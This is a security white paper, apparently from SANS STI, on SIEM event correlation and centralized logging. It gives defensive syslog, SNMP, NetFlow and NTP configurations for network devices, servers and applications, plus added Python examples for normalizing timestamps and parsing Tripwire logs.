
Page 1: Event Correlation and SIEM Vendor Approaches · What's in the data bucket? Event Correlation and SIEM Vendor Approaches STI Joint Written Project Authors: Brough Davis, Jim Horwath,

What's in the data bucket? Event Correlation and SIEM Vendor Approaches

STI Joint Written Project

Authors: Brough Davis, Jim Horwath, John Zabiuk
Advisor: Stephen Northcutt

Accepted: April 12, 2010

Abstract

As technology progresses, IT professionals and security analysts are presented with an ever increasing volume of data to parse through to find evidence of security events. Many companies rely on disparate logging architectures that split network, server, and application logging. Each of these logging architectures is often isolated from the others. The security threats to a company are always increasing, and it is becoming imperative for a company to have a well designed logging infrastructure that consolidates, archives, and correlates all useful logging information from as many parts of a company's network as possible. Not only is it becoming imperative to stop intrusions from both external and internal attackers, but it is crucial for protecting critical information from getting into the wrong hands. Many vendors are starting to offer appliances called SIEMs (Security Information Event Management) that claim to provide these functions. Are these appliances a silver bullet to help protect companies?

What's in the data bucket?

STI Joint Written Project - May 2010 1


1. Executive Summary

The purpose of this paper is to discuss how a Security Information and Event Management system can prevent or mitigate data loss by detecting both network intrusions and extrusions. Such losses of data can cost organizations millions of dollars to recover from; some organizations may never recover. Several key areas will be examined with the intent to discuss how different vendors' SIEM products can mitigate these areas. The areas discussed are:

• Identification of infected systems trying to exfiltrate information
• Countermeasures to detect attempts to infect internal systems
• Detection of outbound sensitive information
• Mitigation of the impact of infected systems

In order for an organization to benefit the most from a SIEM, a great deal of data must be gathered from numerous devices and applications throughout the network. These devices could range from a simple router to a complex business-critical application. This paper will discuss these various sources of log data and the services used to collect that data.

Once data has started being collected, the next task that an organization must tackle is how to correlate the different logs in order to identify where and when an attack is occurring or has occurred. Without additional log analysis software, this can be a daunting, if not impossible, task. To that end, the use of a SIEM to detect and prevent attacks will be examined in detail. Several different SIEM vendors have agreed to share the approach they take to address the identified key areas for discussion. The vendors providing input to this paper are, in alphabetical order:

• LogRhythm
• Nitro Security
• Prism Microsystems
• QRadar (by Q1Labs)

The methods each vendor's solution uses to deal with different attacks will be discussed in detail. Finally, a summary will be provided in the form of a comparison chart outlining the ability of each solution to handle specific issues. A relative comparison of cost will also be included in the comparison.


2. Problem Description

Over the past decade, network intrusions and subsequent data loss have become more and more frequent. The cost of data loss to an organization may be small, but it can also be very large. The Ponemon Institute produces an annual report, The US Cost of Data Breach, which outlines various aspects of the costs associated with data breach and data loss. According to the 2009 US Cost of Data Breach Study, the average cost of insider data breaches in 2009 was $6.7 million per incident. This is an increase from $6.65 million in 2008. The cost per customer record rose from $202 to $208. The most expensive data breach included in the 2009 report cost nearly $31 million to resolve. The least expensive data breach cost $750,000 to resolve. Not only will such data breaches impact an organization in present day costs, but also in terms of future revenue. According to the Ponemon Institute, 20% of consumers terminated a relationship with a company after being notified of a security breach.

The purpose of this paper is to discuss how Security Information and Event Management (SIEM) systems can be utilized to detect intrusions and extrusions, or data loss. It will provide guidance that organizations can use to accomplish actionable results using a SIEM. Specifically, the following areas will be discussed:

• Identification of infected systems trying to exfiltrate information
• Countermeasures to detect attempts to infect internal systems
• Detection of outbound sensitive information
• Mitigation of the impact of infected systems

To assist in the discussion of this topic, the assistance of four SIEM vendors has been enlisted. A discussion of how each vendor's solution addresses each of the aforementioned areas of discussion will be provided. The vendors assisting with this paper, in alphabetical order, are:

• LogRhythm (www.logrythm.com)
• Nitro Security (www.nitrosecurity.com)
• Prism Microsystems (www.prismmicrosys.com)
• QRadar (www.q1labs.com)

Network Example

A typical network design used by small to medium businesses was used as the basis for this report. The network consists of a Microsoft Active Directory environment in two sites with approximately 35 workstations at the primary site, and 25 at the secondary site. All workstations are running either Windows 7 or Windows XP. Within the DMZ for this network, web, email, and DNS services are provided. With the exception of the web server and the Syslog server, which are running Red Hat Linux, all servers are running either Windows Server 2003 or 2008. Each site is utilizing either a Cisco 2800 or Cisco 1800 as the perimeter gateway and first line of defense. Beyond each site perimeter, a Cisco ASA 5510 firewall appliance is used to provide more in-depth protection. To communicate between sites, an IPSec VPN is established between the perimeter routers at each site. Although the primary use of this network is for static users, there are several that require VPN access from remote locations. This is accomplished with the Cisco VPN client connecting to the ASA 5510.

The following is a diagram of this network.

3. Logging Sources

In order to get the greatest benefit out of a SIEM system it's important for a company to review all the different logging sources across network devices, servers, workstations, and business critical applications. The following sections review common configurations for enabling logging from each of these four areas.


Importance of Time

Before logging configurations are described it's important to note that in order to accurately correlate multiple logs from different sources, the timestamps in the logs must be consistent with each other. For example, an attacker may find an exploit on a DNS server and then create user accounts and start downloading attack tools. These actions could be tracked in netflow data, syslog data, and IDS log data. If the clocks on the logging sources were not consistent, then comparing which event happened first and how much time passed between events would make correlating the events very difficult. In effect, bad time sources could destroy any correlation attempts and cause each event to be treated as a singular, non-related event. This is especially bad if each event by itself is not considered a cause for alarm.

To ensure that all logging sources have identical clock times it is highly recommended that NTP (Network Time Protocol) be used across all devices. Using an internal GPS/CDMA based stratum 1 appliance is recommended in medium/large networks. Using pool.ntp.org systems can help in small/medium size networks. Monitoring the NTP state on systems is also recommended to ensure devices maintain connectivity to their NTP servers.

Timezone

It's common to configure a device's timezone to the local time the network/system admins work in, but this may create problems if not all the devices are configured with the same timezone. If devices are putting timestamp information in the logs this may create correlation problems on a central logging or SIEM system. If the SIEM system cannot convert the timezones then the log files cannot be successfully correlated. This problem can be handled in different ways: the device sending logs does not send timestamp information and the logging server itself timestamps the message when received, or one timezone is used across all equipment (e.g. UTC). Using UTC as the standard timezone is sometimes preferred as all other timezones shift from UTC, which is easier to reference in a global company. UTC also avoids daylight savings time (DST) software bugs that commonly surface from time to time.
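As an added illustration (not code from the paper) of why a collector must know each source's timezone before ordering events: the script below takes three constructed BSD-style syslog lines, one each from an IDS sensor, a DNS server and a router stamped in their own local time, and orders them both naively and after conversion to UTC using an assumed device-to-timezone inventory.

```python
"""Normalize syslog timestamps from devices configured with different
timezones into UTC before ordering them for correlation.

Added illustration, not code from the paper. The device-to-timezone
inventory and the three log lines are constructed sample data."""
import re
from datetime import datetime, timedelta, timezone

# Constructed inventory: the timezone each logging source stamps with.
# Devices left in local time are exactly the problem the text describes.
DEVICE_TZ = {
    "dns1": timezone.utc,                              # Linux host kept on UTC
    "edge-rtr": timezone(timedelta(hours=-5)),         # Cisco IOS in US Eastern
    "snort-sensor": timezone(timedelta(hours=-8)),     # sensor left in US Pacific
}

# Constructed sample lines. BSD syslog stamps carry neither year nor zone.
SAMPLE_LOGS = [
    "Jun 18 06:12:03 snort-sensor snort[2201]: [1:2003:8] possible DNS exploit attempt",
    "Jun 18 14:12:41 dns1 useradd[9120]: new user: name=svc_tmp, UID=1007",
    "Jun 18 09:13:05 edge-rtr %SEC-6-IPACCESSLOGP: list 110 permitted tcp "
    "10.10.10.25(40211) -> 203.0.113.7(80), 1 packet",
]

LINE_RE = re.compile(r"^(\w{3}) +(\d{1,2}) (\d{2}):(\d{2}):(\d{2}) (\S+) (.*)$")
MONTHS = {m: i for i, m in enumerate(
    ["Jan", "Feb", "Mar", "Apr", "May", "Jun",
     "Jul", "Aug", "Sep", "Oct", "Nov", "Dec"], 1)}


def parse_line(line, year=2010):
    """Split a BSD syslog line into (naive local datetime, host, message).
    The year is supplied by the caller because the stamp does not carry it."""
    m = LINE_RE.match(line)
    if not m:
        raise ValueError("unrecognised syslog line: " + line)
    mon, day, hh, mm, ss, host, msg = m.groups()
    local = datetime(year, MONTHS[mon], int(day), int(hh), int(mm), int(ss))
    return local, host, msg


def to_utc(local, host):
    """Attach the source's timezone from the inventory and convert to UTC.
    An unknown host is refused rather than silently assumed to be UTC."""
    if host not in DEVICE_TZ:
        raise KeyError("no timezone on record for host " + host)
    return local.replace(tzinfo=DEVICE_TZ[host]).astimezone(timezone.utc)


def naive_order(lines):
    """Host order produced by sorting on the raw stamp, as a collector
    that ignores timezones would."""
    parsed = [parse_line(line) for line in lines]
    return [host for _, host, _ in sorted(parsed, key=lambda p: p[0])]


def correlated_order(lines):
    """(host, UTC timestamp) pairs in true chronological order."""
    events = []
    for line in lines:
        local, host, msg = parse_line(line)
        events.append((to_utc(local, host), host, msg))
    events.sort(key=lambda e: e[0])
    return [(host, ts) for ts, host, _ in events]


def span_minutes(lines):
    """Elapsed minutes between the first and last event, measured in UTC."""
    order = correlated_order(lines)
    return (order[-1][1] - order[0][1]).total_seconds() / 60


if __name__ == "__main__":
    print("naive order:     ", naive_order(SAMPLE_LOGS))
    print("correlated order:", [h for h, _ in correlated_order(SAMPLE_LOGS)])
    print("attack window (min):", round(span_minutes(SAMPLE_LOGS), 2))
```

Naively the router event appears hours after the IDS alert; in UTC the three events fall inside about one minute, which is what a correlation rule needs to see.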

Syslog and SNMP Trap

Many of the events are sent to both syslog and SNMP trap. SNMP Trap logs have a long history of being integrated into alarm management to alert on specific conditions network administrators want to be alerted to. Syslog is good at sending all event information in order to help provide a good picture of the condition of a network device at a given time. SNMP Trap configurations traditionally also have related RMON threshold configurations that allow network admins to have SNMP Trap messages sent when certain conditions (e.g. CPU utilization) meet a threshold value (e.g. 75%). Having both SNMP Trap and Syslog messages being sent from network devices allows for both good device state information as well as specific alarm criteria in order to help build a better message archive that can be used to correlate against to weed out possible malicious activity.

Network

One of the first steps a company must take in the pursuit of a robust logging infrastructure is to audit the network perimeter around critical systems. Having a good understanding of all the network devices allows for better deployment and configuration management of logging. By deploying consistent logging configurations across all equipment a company can get the most benefit out of log correlation. Common network devices on a network may include but are not limited to the following:

• Router
• Switch
• Firewall
• Modems
• IDS/IPS
• Wireless AP
• Vulnerability Scanner

Some examples of these devices and their logging configurations will be described below.

• Cisco IOS
• Cisco Firewall PIX/ASA/FWSM
• Snort Intrusion Detection System (IDS)

Cisco IOS

The following configurations are identical across most Cisco devices running IOS code 12.x such as the 3750 switch, 2900 Router, 1800 Router, and Aironet 1400 Wireless Access Point. Cisco IOS can provide syslog, SNMP trap, and netflow.

Syslog

Configuring syslog on Cisco devices running IOS 12.x is a pretty standard configuration. Some configuration options are useful if you want to select which severity level is sent, or include the hostname and device timestamp in the logs.

Warning: Enabling debug level syslog messages to the console may cause high CPU utilization on a device if the logs are verbose, which may render a device unusable. Making sure console level logging is low or turned off is a good idea during standard operation.


! keep console logging off during normal operation (see warning above)
no logging console
! send messages up to and including debug severity to the syslog host
logging trap debugging
! source syslog from the loopback so the reported host address is stable
logging source-interface Loopback0
logging 2.2.2.2

SNMP Trap

Cisco SNMP trap configuration is fairly straightforward. Many events that are logged as syslog events have an equivalent SNMP trap event. A common mistake is to enable all SNMP traps. This ends up sending every possible event to a monitoring system, which across a large infrastructure may overload a monitoring system or even cause network congestion on 'bottleneck' segments. Knowing the type of events to alarm on not only conserves resources but also helps focus on the type of events that are critical to the network and the company. The below example sends SNMP trap messages to 10.10.10.10 for config changes, BGP events, and AAA events. Note that global traps are enabled for BGP and config events but the AAA events are specific to the 10.10.10.10 host only.

snmp-server host 10.10.10.10 public config bgp aaa
snmp-server enable traps config
snmp-server enable traps bgp

Netflow

Netflow data will provide an important view into operations on your network. Netflow data, also known as session data, reports on conversations between two systems. Netflow data will show connections to malicious sites, conversations using protocols that violate security policies and/or best practices, along with conversations of long durations. In an environment leveraging a SIEM, correlation using Netflow data can improve monitoring, alerting, and reporting capabilities. Netflow data can help analysts identify targets of attacks, and identify malicious sites targeting your network. The following example configures Netflow v9 to export ingress traffic on interface serial 3/0/0 to the Netflow collector (2.2.2.2) on UDP port 9997.

ip cef
ip flow-export version 9
ip flow-export destination 2.2.2.2 9997
interface serial 3/0/0
 ip flow ingress

NTP

NTP configuration for Cisco IOS can be easily enabled but has additional security options that are sometimes overlooked. Basic NTP messages can be easily spoofed, make it easy to enumerate information such as internal NTP servers, and leave the NTP service or the router itself open to DoS attacks. Enabling NTP key authentication, restricting NTP servers and clients with access-lists, and disabling the NTP service on public interfaces will reduce the possibility of NTP manipulation by attackers. The below example has a router configured to use 3 NTP servers, restricts NTP updates to only those 3 servers, allows the network 10.10.10.0/24 to use the router as an NTP server, sources NTP messages from the Loopback0 interface, disables NTP services on the public serial 0/0 interface, and has NTP authentication enabled.

Router(config)#ntp server 1.1.1.1 key 10
Router(config)#ntp server 2.2.2.2 key 10
Router(config)#ntp server 3.3.3.3 key 10
Router(config)#access-list 20 permit 1.1.1.1 0.0.0.0
Router(config)#access-list 20 permit 2.2.2.2 0.0.0.0
Router(config)#access-list 20 permit 3.3.3.3 0.0.0.0
Router(config)#access-list 20 deny any
Router(config)#ntp access-group peer 20
Router(config)#access-list 21 permit 10.10.10.0 0.0.0.255
Router(config)#access-list 21 deny any
Router(config)#ntp access-group serve-only 21
Router(config)#ntp source Loopback0
Router(config)#ntp authenticate
Router(config)#ntp authentication-key 10 md5 MySecretKey
Router(config)#ntp trusted-key 10
Router(config)#interface serial 0/0
Router(config-if)#ntp disable

Note that "key 10" on each ntp server line is what makes the router authenticate the time it receives from those servers; "ntp authenticate" alone only enables the feature.

WARNING: Configuring NTP authentication does not require all clients to use NTP authentication; it enables clients to use authentication. Your router will still respond to unauthenticated requests, so be sure to use ACLs to limit NTP access.

Cisco PIX/ASA/FWSM

The Cisco PIX/ASA firewall appliances and Catalyst 6500 service modules have basic syslog and advanced syslog configuration options. Basic SNMP trap configuration options are also available.

Basic Syslog

There are a handful of syslog options that need to be taken into account such as including timestamps, host-id, and standby log information in addition to the standard logging severity and syslog host. The below example enables syslog, includes the timestamp, includes the hostname, and sends debug level messages to 2.2.2.2 on the inside interface. Also note that notification severity logs are sent to the system buffer, which will not include verbose connection entries but does include useful access-list deny log messages.

logging enable
logging timestamp
logging standby
logging buffered notifications
logging trap debugging
logging device-id hostname
logging host inside 2.2.2.2

Warning: Debug mode will log every connection traversing the firewall, which will drastically increase the amount of syslog messages going to the syslog server. Proper disk storage capacity and I/O speeds will have to be in place in order to allow for enabling debug level logging. Debug level logs may also increase CPU utilization on the firewall as well as requiring additional bandwidth to the syslog server. It is recommended to use the advanced syslog option if specific debug level output is needed without sending all debug logs.

Advanced Syslog

PIX/ASA 7.0 provides several mechanisms that enable you to configure and manage syslog messages in groups. These mechanisms include message severity level, message class, message ID, or a custom message list that you create. With the use of these mechanisms, you can enter a single command that applies to small or large groups of messages. When you set up syslogs this way, you are able to capture the messages from the specified message group and no longer all the messages from the same severity.

The below example captures all VPN (IKE and IPsec) class system log messages with debugging level or higher in addition to sending all notification level events.

hostname(config)#logging enable
hostname(config)#logging timestamp
hostname(config)#logging list my-list level debugging class vpn
hostname(config)#logging list my-list level notification
hostname(config)#logging trap my-list
hostname(config)#logging host inside 192.168.1.1

SNMP Trap

Cisco firewall SNMP traps typically are only used for standard traps: authentication, cold start, link up and link down. While these alarms are typically only used for hardware malfunctions, they can also be useful in situations where a security event may be related (e.g. an attacker brute forcing an SSH login). The below configuration example sends SNMP traps from the inside interface to an SNMP trap server with the SNMP community string of 'supersecret'.

snmp-server host inside 1.1.1.1 trap community supersecret

NTP

PIX/ASA devices can only be configured as NTP clients and are not able to be used as an NTP server time source. The following configuration example has the PIX/ASA using the NTP server 2.2.2.2 on the inside interface, using an MD5 hashed passphrase of 'supersecret' for authentication.

ntp authenticate
ntp authentication-key 1 md5 supersecret
ntp trusted-key 1
ntp server 2.2.2.2 key 1 source inside

Snort IDS/IPS

Intrusion Detection Systems are a valuable source of logging information, adding value to log correlation. A common open source IDS is called Snort. Snort has many different logging outputs. To send alerts to syslog, use the -s switch or use the alert_syslog output plugin in the snort.conf file. The default facility and priority for the syslog alerting mechanism are LOG_AUTHPRIV and LOG_ALERT. The below snort.conf example configuration will send Snort alerts to the local syslog local6 facility. The syslog or syslog-ng configuration can then send the alert messages to a remote server.

...
# end of file
output alert_syslog: LOG_LOCAL6 LOG_ALERT
output alert_fast: alert

Servers/Workstations

The majority of workstations common to many business environments are using Microsoft Windows operating systems such as Windows XP, Vista, and now Windows 7. Enterprise Linux as well as Microsoft Windows 2003/2008 Server distributions are popular in many server environments.


Enterprise Linux 3/4/5

Enterprise Linux distributions such as Red Hat Enterprise Linux and CentOS 3, 4, and 5 are common Linux server operating systems. System messages can be sent to a central logging system using common open source logging applications such as syslog, syslog-ng, rsyslog, and snmptrapd.

Syslog

The syslog application found on most Linux systems is called syslog. The below syslog.conf entry allows a server to send messages of all severities to the remote host named 'logserver'. 'logserver' would be defined in DNS or the /etc/hosts file.

*.* @logserver

Syslog-ng

Syslog-ng (syslog next generation) is an application that extended syslog with additional features such as using TCP and more advanced filtering options. The below example of the syslog-ng.conf file shows how to send all messages to a remote syslog-ng logging server named 'logserver'.

source from_local {
    unix-stream("/dev/log");
    pipe("/proc/kmsg" log_prefix("kernel: "));
    internal();
};

destination central_log {
    tcp("logserver" port(514));
};

log {
    source(from_local);
    destination(central_log);
};

rsyslog

rsyslog is one of the more recent logging applications and is the current standard logging application on enterprise Linux distributions. The following rsyslog.conf configuration will forward all system messages to a remote server named logserver over TCP port 514. UDP and RELP ('reliable protocol') are also optional protocols for sending messages via rsyslog.

# TCP: the double @@ selects TCP, a single @ would select UDP
*.* @@logserver:514


NTP

The NTP application service comes standard on most Linux distributions and is usually enabled to point at pool.ntp.org systems or other common distribution specific NTP servers on the Internet. The following example ntp.conf file shows time being received from the pool.ntp.org NTP servers. Additional security options to restrict NTP queries and changes via NTP are also included.

driftfile /var/lib/ntp/ntp.drift
server 1.north-america.pool.ntp.org
server 2.north-america.pool.ntp.org
server 3.north-america.pool.ntp.org
# By default, exchange time with everybody, but don't allow configuration.
restrict -4 default kod notrap nomodify nopeer noquery
restrict -6 default kod notrap nomodify nopeer noquery
# Local users may interrogate the ntp server more closely.
restrict 127.0.0.1
restrict ::1

Microsoft Windows

• Windows 2003/2008 Server
• Windows XP/Vista/7

Microsoft Windows systems typically use third party applications to send event log information to a remote server. One common application used on many Windows operating systems is called SNARE. Below is a picture of the network configuration section for SNARE, in which local logs can be sent to a remote server (snare, syslog, syslog-ng, etc.).


The Snare Agent includes a MSWinEventLog tag before each message. Match this tag with a program filter in syslog-ng.conf, and use flags(final) to route the logs from Windows into a custom file before any subsequent destination.

filter windows {
    program("MSWinEventLog");
};

destination windows {
    file("/var/log/archive/windows/$R_YEAR/$R_MONTH/$R_YEAR-$R_MONTH-$R_DAY"
        template("$ISODATE <$FACILITY.$PRIORITY> $HOST $MSG\n")
        template_escape(no)
    );
};

# source(local) must name a source statement already defined in this file
# (the earlier example defines one called from_local); flags(final) stops
# matching messages from also reaching the destinations of later log statements.
log {
    source(local); filter(windows); destination(windows);
    flags(final);
};

NTP

Windows desktops can be configured to get time information from NTP services through the Control Panel -> Date and Time settings, as seen in the below example.

Applications

Many companies have a difficult time tracking all the different applications that run in their network. It's important that a company understands the applications that are critical to the business in order to assess what logging can be beneficial from those applications. Below are some commonly found applications and their respective configurations in order to enable logging to a remote syslog server.

• Apache
• BIND
• Microsoft Exchange
• Microsoft SQL
• Tripwire


Apache

Apache is a common web server application found on many different operating systems. The main configuration file used for Apache is httpd.conf. Error events and access events are treated separately and usually log to different locations.

Error Logs

The error log is usually written to a file (typically error_log on UNIX systems and error.log on Windows and OS/2). On UNIX systems it is also possible to have the server send errors to syslog or pipe them to a program.

ErrorLog syslog:local1

Sending Apache logs to syslog requires a local syslog daemon to relay the syslog messages to a central syslog server.

Access Logs

Unfortunately, only the error log has this feature built in. It's extremely useful to also have your access logs logged to a remote server, for the reasons described earlier. There is a technique to allow you to log your access log to syslog as well. However, as with any other article of this nature, we encourage you to check the Apache web server documentation site because this feature may be built in at some point in the future, rendering this technique obsolete. At the moment, here's what you need to do. This is a two-step process. First, create a script that is capable of sending entries to syslog:

#!/usr/bin/perl
use strict;
use warnings;
use Sys::Syslog qw( :DEFAULT setlogsock );

# talk to the local syslog daemon over its UNIX socket
setlogsock('unix');
# ident "apache", options as one comma-separated string, facility local2
openlog('apache', 'cons,pid', 'local2');
# each access log line Apache pipes in becomes one notice-level message;
# the line is passed as an argument, never as the format string
while (my $log = <STDIN>) {
    chomp $log;
    syslog('notice', '%s', $log);
}
closelog();

Second, point your access log at this script using the piped logfile syntax:

CustomLog |/usr/local/apache/bin/apache_syslog combined


BIND

BIND (Berkeley Internet Name Daemon) is a common DNS application service. BIND can log events to syslog fairly easily by adding the following options to the named.conf configuration file.

logging {
    channel syslog_chnl {
        syslog local1;
        severity info;
    };
    // a channel only receives messages once a category is bound to it
    category default { syslog_chnl; };
};

Sending BIND logs to syslog requires a local syslog daemon to relay the syslog messages to a central syslog server.

Microsoft Exchange

Microsoft Exchange server logs can be sent to a remote logging server using many different applications available. A common application used is called Snare. Snare Epilog for Windows is a program that facilitates the central collection and processing of Windows text-based log files. Epilog for Windows also supports date stamped log files such as IIS, ISA, SMTP and Exchange message tracking logs. Log information is converted to tab delimited text format, then delivered over UDP to a remote server. The following picture describes where the log format options are configured in Snare.


Microsoft SQL

One method for sending Exchange and MSSQL event logs to a remote server is to use the SNARE application for MSSQL. The development of 'SNARE for Microsoft SQL Server' allows events generated by MS SQL to be collected and forwarded to a remote audit collection facility. The SnareMSSQL service can be configured to monitor a variety of MSSQL configurations. The default is to monitor the master database within the default local MSSQL instance. This can be modified on a per objective basis to specify a named MS SQL instance and a database within that instance. The below example shows the configuration page for setting which database instance and logging information to send to the remote logging server.

TripWire

Host intrusion detection is an important piece of every network that deploys a defense in depth methodology. Effectively correlating log events requires using both network events and host based events. There are different host intrusion detection system (HIDS) applications for both Windows and Linux operating systems. One application that is common to both Windows and Linux is called Tripwire.


Enabling Tripwire to log to syslog requires changing the "SYSLOGREPORTING" variable in the twcfg.txt configuration file. The variable is described in more detail below.

SYSLOGREPORTING

If this variable is set to true, messages are sent to the syslog for four events: database initialization, integrity check completions, database updates, and policy updates. The syslog messages are sent from the "USER" facility at the "NOTICE" level. The following log messages are examples of the four types of logging messages found in the current Linux open source Tripwire 2.3 version.

Jun 18 14:09:42 lighthouse tripwire[9444]: Database initialized: /var/lib/tripwire/test.twd

Jun 18 14:10:57 lighthouse tripwire[9671]: Integrity Check Complete: TWReport lighthouse 20000618141057 V:2 S:90 A:1 R:0 C:1

Jun 18 14:11:19 lighthouse tripwire[9672]: Database Update Complete: /var/lib/tripwire/test.twd

Jun 18 14:18:26 lighthouse tripwire[9683]: Policy Update Complete: /var/lib/tripwire/test.twd

The letters in the Integrity Check log correspond to the number of violations, the maximum severity level, and the number of files added, deleted, and changed, respectively. With any value other than true, or if this variable is removed from the configuration file, syslog reporting will be turned off.
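As an added illustration (not part of the original paper or of Tripwire itself), the following Python script parses syslog lines of the form shown above, pulls the V/S/A/R/C counters out of the Integrity Check Complete message, and flags checks whose violations meet a severity threshold. The sample lines, the threshold of 66, and the sshd line mixed in to show non-Tripwire input being skipped are all constructed for this example.

```python
import re
from typing import Optional

# Constructed sample input modelled on the Tripwire 2.3 syslog messages quoted
# above; host name, PIDs and timestamps are made up for this example.
SAMPLE_LOG = """\
Jun 18 14:09:42 lighthouse tripwire[9444]: Database initialized: /var/lib/tripwire/test.twd
Jun 18 14:10:57 lighthouse tripwire[9671]: Integrity Check Complete: TWReport lighthouse 20000618141057 V:2 S:90 A:1 R:0 C:1
Jun 18 14:11:19 lighthouse tripwire[9672]: Database Update Complete: /var/lib/tripwire/test.twd
Jun 18 14:18:26 lighthouse tripwire[9683]: Policy Update Complete: /var/lib/tripwire/test.twd
Jun 18 16:00:03 lighthouse tripwire[9701]: Integrity Check Complete: TWReport lighthouse 20000618160003 V:0 S:0 A:0 R:0 C:0
Jun 18 16:00:04 lighthouse sshd[9710]: Accepted publickey for jdoe from 10.10.10.5
"""

# "<Mon dd hh:mm:ss> <host> tripwire[<pid>]: <event>: <detail>"
LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) (?P<host>\S+) "
    r"tripwire\[(?P<pid>\d+)\]: (?P<event>[^:]+): ?(?P<detail>.*)$"
)
# V = violations, S = maximum severity, A/R/C = files added/removed/changed
REPORT_RE = re.compile(
    r"TWReport (?P<rhost>\S+) (?P<when>\d{14}) "
    r"V:(?P<v>\d+) S:(?P<s>\d+) A:(?P<a>\d+) R:(?P<r>\d+) C:(?P<c>\d+)"
)


def parse_line(line: str) -> Optional[dict]:
    """Parse one Tripwire syslog line; return None for lines from other programs."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = {
        "timestamp": m["ts"],
        "host": m["host"],
        "pid": int(m["pid"]),
        "event": m["event"].strip(),
        "detail": m["detail"],
    }
    if rec["event"] == "Integrity Check Complete":
        r = REPORT_RE.search(rec["detail"])
        if r:
            rec.update(
                report_time=r["when"],
                violations=int(r["v"]),
                max_severity=int(r["s"]),
                added=int(r["a"]),
                removed=int(r["r"]),
                changed=int(r["c"]),
            )
    return rec


def parse_log(text: str) -> list:
    """Parse every Tripwire line in a block of syslog text, skipping other programs."""
    return [rec for rec in (parse_line(l) for l in text.splitlines()) if rec]


def integrity_alerts(records: list, min_severity: int = 66) -> list:
    """Return integrity checks with violations at or above min_severity.

    66 is an assumed threshold: the stock Tripwire policy defines 33/66/100 for
    low/medium/high, so tune it to the site's twpol.txt.
    """
    return [
        r for r in records
        if r["event"] == "Integrity Check Complete"
        and r.get("violations", 0) > 0
        and r.get("max_severity", 0) >= min_severity
    ]


def baseline_changes(records: list) -> list:
    """Database and policy updates re-baseline Tripwire (the current file state is
    accepted as good), so an update not tied to a change ticket deserves review."""
    return [r for r in records
            if r["event"] in ("Database Update Complete", "Policy Update Complete")]
```

Running parse_log on the sample yields five Tripwire records; the first integrity check (pid 9671, two violations at severity 90) is the only alert, and the two update events are listed for review.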

Tripwire 4.x and 7.x versions can be installed on Windows operating systems as well as AIX. The following are some examples of Tripwire 7.x logs.

May 3 10:23:17:2010 172.23.6.115 TE: Information HostName=tripwire LogId=-9223372036788055483 LogCategory="Policy Score Change" LogUser=gumby NodeId=-9223372036793548952 NodeName=chum.jwp.com NodeIp=10.10.10.10 AssociatedObjects=-9223372036854775636:-9223372036841274731,-9223372036854775751:-9223372036793548952 Msg="The score for Node 'chum.jwp.com' under Policy 'IBM AIX 5.1 Benchmark - CIS v1.0.1' changed from 'Failing' to 'Gold or better'."

May 3 14:02:52:2010 172.23.6.115 TE: Information HostName=tripwire LogId=-9223372036788055473 LogCategory="Policy Test" LogUser=system AssociatedObjects=-9223372036854775636:-9223372036841274731,-9223372036854775636:-9223372036853067338,-9223372036854775636:-9223372036853067349,-9223372036854775636:-9223372036853067354,-9223372036854775636:-9223372036853069355,-9223372036854775636:-9223372036853069358,-9223372036854775636:-9223372036853069377,-9223372036854775636:-9223372036853070994 Msg="Deleted 79 test results and 0 waivers affecting 8 policies[LF]Policy MS Windows Server 2003 DC Legacy Benchmark - CIS v2.0: Deleted 3 test results for this policy that were more than 31 days old.[LF]Policy MS Windows Server 2003 DC Specialized Security Benchmark - CIS v2.0: Deleted 3 test results for this policy that were more than 31 days old.[LF]Policy IBM AIX 5.1 Benchmark - CIS v1.0.1: Deleted 104 test results for this policy that were more than 31 days old.[LF]Policy MS Windows Server 2003 DM Enterprise Benchmark - CIS v2.0: Deleted 3 test results for this policy that were more than 31 days old.[LF]Policy MS Windows Server 2003 DM Specialized Security Benchmark - CIS v2.0: Deleted 3 test results for this policy that were more than 31 days old.[LF]Policy MS Windows Server 2000 Level 2 Benchmark - CIS v2.2.1: Deleted 1 test results for this policy that were more than 31 days old.[LF]Policy MS Windows Server 2003 DM Legacy Benchmark - CIS v2.0: Deleted 3 test results for this policy that were more than 31 days old.[LF]Policy MS Windows Server 2003 DC Enterprise Benchmark - CIS v2.0: Deleted 3 test results for this policy that were more than 31 days old.[LF]"


May 3 14:43:56:2010 172.23.6.115 TE: Information HostName=tripwire LogId=-9223372036788055472 LogCategory=Security LogUser=system Msg="Login attempt for 'gumby' failed."

4. Logging Services

SYSLOG

Network devices can produce large quantities of log messages in a very short period. Without additional configuration, these messages are displayed on the locally attached console only. Some of these messages are routine, while others may indicate that the device is about to fail. Unless someone is consistently watching the console for these messages, they are lost. This problem is compounded further with each additional device on a network. To help reduce the loss of important log messages, most network devices allow for the forwarding of these messages to a syslog server over an IP network.

Developed in the early 1980s by Eric Allman, syslog was originally designed to work exclusively with Sendmail. Since then, its popularity has increased exponentially and it is implemented in nearly all network devices. The current documentation for syslog resides in RFC 5424.

The syslog facility allows devices to forward log messages over an IP network to a data store on a remote host. Many devices that do not have any other communication means can use this functionality to notify administrators of error conditions. Prior to syslog, each device and application would handle log messages differently. Messages could be written to STDERR, to a file, or to a pipe. There are many uses for the syslog facility, ranging from basic log message aggregation to network management and security auditing. The syslog facility is cross-platform, meaning that non-homogeneous devices can send log messages to a single repository. Syslog provides the ability for messages to be sorted, either by their severity level or by their source. Messages can be sent to a variety of destinations including log files, users' terminals, or remote systems. Once these log messages are stored in a single repository, they can be analyzed by a variety of open source and third-party applications.

There are numerous implementations of syslog. This section of the report will discuss three of these implementations – syslogd, rsyslog, and syslog-ng.

Table 1 - Syslog facility names

Facility    Program using the facility
*           All facilities except "mark"
auth        Security and authorization-related commands
authpriv    Sensitive/private authorization messages
cron        cron daemon
daemon      System daemons
ftp         ftpd
kern        kernel
local0-7    Eight flavors of local message
lpr         Line printer spooling system
mail        sendmail (and other mail applications)
mark        Timestamps generated at regular intervals
news        Usenet news
syslog      syslogd internal messages
user        User processes
uucp        Obsolete

Table 2 - Syslog severity levels (descending severity)

Level     Meaning
emerg     Panic situation
alert     Urgent situation
crit      Critical condition
err       Other error conditions
warning   Warning messages
notice    May be worth investigating
info      Informational message
debug     For debugging only

SYSLOGD

Syslogd is the basis for input that many log management systems use. The origins of syslogd are in BSD, and many other syslog implementations are based on syslogd.

The syslog architecture consists of three parts:

o Syslogd – The logging daemon
o Openlog – Library routines that submit messages to syslogd
o Logger – a user-level command to submit log messages from the shell

